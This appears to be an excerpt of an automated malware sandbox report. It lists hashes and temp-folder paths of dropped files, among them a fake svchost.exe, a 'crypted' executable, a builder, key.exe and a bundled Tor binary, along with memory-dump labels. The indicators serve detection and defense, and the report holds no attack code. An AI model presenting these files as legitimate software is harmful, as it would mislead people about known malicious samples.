SHA256 58b772b53bfe898513c0eb264ae4fa47ed3d8f256bc8f70202356d20f9ecb6dc
SHA512 1cca8e6c3a21a8b05cc7518bd62c4e3f57937910f2a310e00f13f60f6a94728ef2004a2f4a3d133755139c3a45b252e6db76987b6b78bc8269a21ad5890356ad

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_socket.pyd

MD5 e137df498c120d6ac64ea1281bcab600
SHA1 b515e09868e9023d43991a05c113b2b662183cfe
SHA256 8046bf64e463d5aa38d13525891156131cf997c2e6cdf47527bc352f00f5c90a
SHA512 cc2772d282b81873aa7c5cba5939d232cceb6be0908b211edb18c25a17cbdb5072f102c0d6b7bc9b6b2f1f787b56ab1bc9be731bb9e98885c17e26a09c2beb90

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_cffi_backend.pyd

MD5 ebb660902937073ec9695ce08900b13d
SHA1 881537acead160e63fe6ba8f2316a2fbbb5cb311
SHA256 52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd
SHA512 19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\python3.dll

MD5 07bd9f1e651ad2409fd0b7d706be6071
SHA1 dfeb2221527474a681d6d8b16a5c378847c59d33
SHA256 5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5
SHA512 def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\sqlite3.dll

MD5 926dc90bd9faf4efe1700564aa2a1700
SHA1 763e5af4be07444395c2ab11550c70ee59284e6d
SHA256 50825ea8b431d86ec228d9fa6b643e2c70044c709f5d9471d779be63ff18bcd0
SHA512 a8703ff97243aa3bc877f71c0514b47677b48834a0f2fee54e203c0889a79ce37c648243dbfe2ee9e1573b3ca4d49c334e9bfe62541653125861a5398e2fe556

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_sqlite3.pyd

MD5 7f61eacbbba2ecf6bf4acf498fa52ce1
SHA1 3174913f971d031929c310b5e51872597d613606
SHA256 85de6d0b08b5cc1f2c3225c07338c76e1cab43b4de66619824f7b06cb2284c9e
SHA512 a5f6f830c7a5fadc3349b42db0f3da1fddb160d7e488ea175bf9be4732a18e277d2978720c0e294107526561a7011fadab992c555d93e77d4411528e7c4e695a

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_lzma.pyd

MD5 b5fbc034ad7c70a2ad1eb34d08b36cf8
SHA1 4efe3f21be36095673d949cceac928e11522b29c
SHA256 80a6ebe46f43ffa93bbdbfc83e67d6f44a44055de1439b06e4dd2983cb243df6
SHA512 e7185da748502b645030c96d3345d75814ba5fd95a997c2d1c923d981c44d5b90db64faf77ddbbdc805769af1bec37daf0ecee0930a248b67a1c2d92b59c250c

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_bz2.pyd

MD5 a4b636201605067b676cc43784ae5570
SHA1 e9f49d0fc75f25743d04ce23c496eb5f89e72a9a
SHA256 f178e29921c04fb68cc08b1e5d1181e5df8ce1de38a968778e27990f4a69973c
SHA512 02096bc36c7a9ecfa1712fe738b5ef8b78c6964e0e363136166657c153727b870a6a44c1e1ec9b81289d1aa0af9c85f1a37b95b667103edc2d3916280b6a9488

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_ctypes.pyd

MD5 87596db63925dbfe4d5f0f36394d7ab0
SHA1 ad1dd48bbc078fe0a2354c28cb33f92a7e64907e
SHA256 92d7954d9099762d81c1ae2836c11b6ba58c1883fde8eeefe387cc93f2f6afb4
SHA512 e6d63e6fe1c3bd79f1e39cb09b6f56589f0ee80fd4f4638002fe026752bfa65457982adbef13150fa2f36e68771262d9378971023e07a75d710026ed37e83d7b

memory/536-1300-0x0000000005B80000-0x0000000005BD4000-memory.dmp

memory/5976-1311-0x000000006FA70000-0x000000006FABC000-memory.dmp

memory/5976-1323-0x0000000006230000-0x000000000624E000-memory.dmp

memory/1684-1326-0x0000000004C00000-0x0000000004CD4000-memory.dmp

memory/5976-1324-0x0000000006C80000-0x0000000006D23000-memory.dmp

memory/536-1380-0x0000000000400000-0x000000000184E000-memory.dmp

memory/5976-1310-0x0000000006C40000-0x0000000006C72000-memory.dmp

memory/5976-1479-0x0000000006F90000-0x0000000006FAA000-memory.dmp

memory/5976-1478-0x00000000075D0000-0x0000000007C4A000-memory.dmp

memory/1684-1314-0x0000000000760000-0x0000000000804000-memory.dmp

memory/5976-2208-0x00000000049F0000-0x00000000049FA000-memory.dmp

memory/5976-2768-0x0000000007220000-0x00000000072B6000-memory.dmp

memory/5976-3569-0x00000000071C0000-0x00000000071D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe

MD5 3965af8553f2dd6467b7877f13ec3b2e
SHA1 ed0ab005fde56a8227fbeac7f62db45e1060bf42
SHA256 604dc2088913709520dbde3830c37c44c9cf9dd1ddd493a1ea71a710c3650015
SHA512 9dcd4ec201385c6a41187cf2621ddd1b7b354746ade88c4a74bf3c6d7ec63a170e3add8b56ef324ae770f60d83c1fdab9a3f1f98c1bcfb7a276f9cc65f18aea9

C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe

MD5 08dafe3bb2654c06ead4bb33fb793df8
SHA1 d1d93023f1085eed136c6d225d998abf2d5a5bf0
SHA256 fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700
SHA512 9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99

memory/1684-5221-0x0000000004DE0000-0x0000000004E36000-memory.dmp

memory/5976-5225-0x00000000071F0000-0x00000000071FE000-memory.dmp

memory/5976-5230-0x0000000007200000-0x0000000007214000-memory.dmp

memory/5976-5232-0x00000000072E0000-0x00000000072FA000-memory.dmp

memory/5976-5234-0x00000000072D0000-0x00000000072D8000-memory.dmp

memory/5556-5262-0x0000000000460000-0x0000000000466000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe

MD5 304a5a222857d412cdd4effbb1ec170e
SHA1 34924c42524ca8e7fcc1fc604626d9c5f277dba2
SHA256 d67fb52973c445a3488a9d6a9a9ff3ebebb05b1c0e853cebfa8bba1a5953f0d6
SHA512 208b39436b520e909eb8262f68314dcb93852ea5f00a1d4ce8bd682dd5e20ad313e65ff293c8062bfed95ffe101f6ead3d7da4886e779031101329a3764b855f

C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe

MD5 c7bb7b93bc4327b0190c852138cc4f0c
SHA1 af779bc979d9d4515510b60511ef14d1d3331f47
SHA256 bcb6f8e7702380c8f2eec6393a4a4d414027d75786593072e524aef7f4d232cd
SHA512 56a4fe9007421e2a0a0afbfc12d1b3fa8544ff71986282292608966725e2a436b751fc4aa7a7bb99a0dfe50aada7419c4450d01dd94ac78251ab8ce33d432d55

C:\Users\Admin\AppData\Local\Temp\Files\builder.exe

MD5 c2bc344f6dde0573ea9acdfb6698bf4c
SHA1 d6ae7dc2462c8c35c4a074b0a62f07cfef873c77
SHA256 a736269f5f3a9f2e11dd776e352e1801bc28bb699e47876784b8ef761e0062db
SHA512 d60cf86c0267cd4e88d21768665bbb43f3048dace1e0013b2361c5bfabf2656ff6215dfb75b6932e09545473305b4f707c069721cdde317b1df1709cd9fc61c0

C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe

MD5 a474faa2f1046fbab4c3ad1e3a26097e
SHA1 aa526b2583dd9b72dd4ae2549189c6631f8486c2
SHA256 391233a33e1e163875616a8c1564ec8597b630ffcbb4b123c5cfb5b5d3eeea8b
SHA512 947f248d1e7c7c897a9b508607611bb69fa3a9ac1d8b5a0e0343e955a7d6dd235408d086bdf2ec4e9f15e30c1f082b9980144f6de7eebf95e71719c5e1e7040b

C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe

MD5 6782ce61039f27f01fb614d3069c7cd0
SHA1 6870c4d274654f7a6d0971579b50dd9dedaa18ad
SHA256 11798c5a66618d32e2666009fb1f4569ae8b2744fa0278f915f5c1eefb1fd98d
SHA512 90fc316784eba2e553c2658ac348e6fcb4ab6987209d51e83c1d39d7a784ca0f18729349904bac6d92d3b163ce9f0270369a38eac8c9541ae211d74bce794938

memory/6396-5413-0x000002098EC40000-0x000002098ED08000-memory.dmp

C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe

MD5 07244a2c002ffdf1986b454429eace0b
SHA1 d7cd121caac2f5989aa68a052f638f82d4566328
SHA256 e9522e6912a0124c0a8c9ff9bb3712b474971376a4eb4ca614bb1664a2b4abcf
SHA512 4a09db85202723a73703c5926921fef60c3dddae21528a01936987306c5e7937463f94a2f4a922811de1f76621def2a8a597a8b38a719dd24e6ff3d4e07492ca

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

MD5 121e1634bf18768802427f0a13f039a9
SHA1 8868654ba10fb4c9a7bd882d1f947f4fd51e988e
SHA256 5fc600351bade74c2791fc526bca6bb606355cc65e5253f7f791254db58ee7fa
SHA512 393df326af3109fe701b579b73f42f7a9b155bb4df6ea7049ad3ae9fdd03446576b887a99eb7a0d59949a7a63367e223253448b6f1a0ebeaf358fa2873dcc200

C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe

MD5 915e73432043f7666919cda54815bf6f
SHA1 8c4f0faf612938ef9a3513aa48a5f8cec8ce1289
SHA256 2275d323b2591aba2d76160cf4f6b12f5f3018da7fa64978ada989dfb127a2b8
SHA512 67d9fcddfed41cd1f547d0e9a8a6a5cd46d37c370ae22a3a9d501623c6398b9352fa0493af9d29358a74049f7f2c28501231719b4025624abe8d003a85a402a5

C:\Users\Admin\AppData\Local\Temp\Files\shopfree.exe

MD5 a3881dfafe2384ee33c8afb5eeda3321
SHA1 7e212f0a0b97de88ed97976cd57f18e13a3ff8b6
SHA256 d76391b6dca2b5057a0adfb446cf6f80e9be5ec4241cfeddff6e1ca03b331a72
SHA512 4941b98b27b024e94cb83b804ac184bd6c35b1aefab0351dc9f173bc3510910a05b16949e5b9610c72a622740cb5dc46840a2924db7a994046c982430865b037

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

MD5 b9ada94355eb4620796420f457edcaa1
SHA1 2913a116f9fea713045de4a59ae55d1fe4c407ec
SHA256 a6f32d15c2d83286fe4de90337c90c8a3844d838aa9baad34fa76f492b5782cb
SHA512 f241ce9603b2d7f8434d16beb607cef2b42cc6260813d7f1fa41ade3e9e421bd3ecde2bb22277daefefd970afef84c723c1d9f299f8bd5668de35b2acd6db33e

C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe

MD5 795197155ca03f53eed7d90a2613d2a7
SHA1 e177b0c729b18f21473df6decd20076a536e4e05
SHA256 9a28b8f494f4f89738766b98f51242ceb5e2207175db7f6682e729451c83fdcf
SHA512 4aff1b1d26b5d3389d8deb0b9b428f4e81daa9d530e37cb3064d33c243407dbf73a218367ba4fa2138b068fc40b5588d5d4ae4849a921ea5e407ad4d3610084b

C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe

MD5 3ace4cb9af0f0a2788212b3ec9dd4a4e
SHA1 2914bd74b5553f5f4dbd5f7b23bc00d04a2c77cb
SHA256 121bfcb759e561bca3f63777498646c80d030a92dac5a27c7c9cc8f5581e672e
SHA512 76ecc354b1fb5bf93f18bbe9f85401ef40e0826f7eea73a0cb5afda5d69ec384a459c07b6cc2386176888978d2dbb9bac9360e249114c59799de0984bbba5c56

C:\Users\Admin\AppData\Local\Temp\Files\key.exe

MD5 4cdc368d9d4685c5800293f68703c3d0
SHA1 14ef59b435d63ee5fdabfb1016663a364e3a54da
SHA256 12fb50931a167e6e00e3eb430f6a8406e80a7649f14b1265247b56416ac919b0
SHA512 c8f9d2ba84603384b084f562c731609f9b7006237f2c58b5db9efdfc456932b23e2582f98fb1eb87e28363dc8d9ae4c0a950c9482685bb22604c66a1e6d611de